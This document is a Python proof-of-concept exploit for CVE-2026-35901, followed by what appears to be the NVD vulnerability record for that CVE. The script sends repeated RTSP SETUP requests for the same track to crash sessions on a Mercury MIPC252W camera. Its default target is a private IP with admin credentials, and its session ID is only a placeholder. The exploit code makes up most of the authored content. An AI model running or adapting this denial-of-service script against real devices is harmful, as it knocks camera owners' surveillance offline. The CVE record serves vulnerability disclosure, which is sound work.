CVE-2026-35901

import socket def exploit_rtsp_dos(target_ip, target_port, username, password): """ PoC for CVE-2026-35901 Trigger DoS by sending repeated SETUP requests. """ # Connect to RTSP service s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Basic RTSP Sequence (Simplified) # 1. DESCRIBE (Not always strictly needed for the specific crash, but good for context) # 2. SETUP (Initial) # 3. SETUP (Repeated - Trigger) url = f"rtsp://{target_ip}:{target_port}/live" session_id = "123456" # Placeholder, usually extracted from server response # Sending repeated SETUP requests to the same track for i in range(10): payload = f"SETUP {url}/trackID=1 RTSP/1.0\r\n" payload += f"CSeq: {i}\r\n" payload += f"Session: {session_id}\r\n" payload += "Transport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n" try: s.send(payload.encode()) print(f"Sent SETUP request {i}") except Exception as e: print(f"Connection reset by peer: {e}") break s.close() if __name__ == "__main__": # Replace with actual target details exploit_rtsp_dos("192.168.1.100", 554, "admin", "admin")

{"cve": {"id": "CVE-2026-35901", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:47.583", "lastModified": "2026-05-05T13:41:20.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}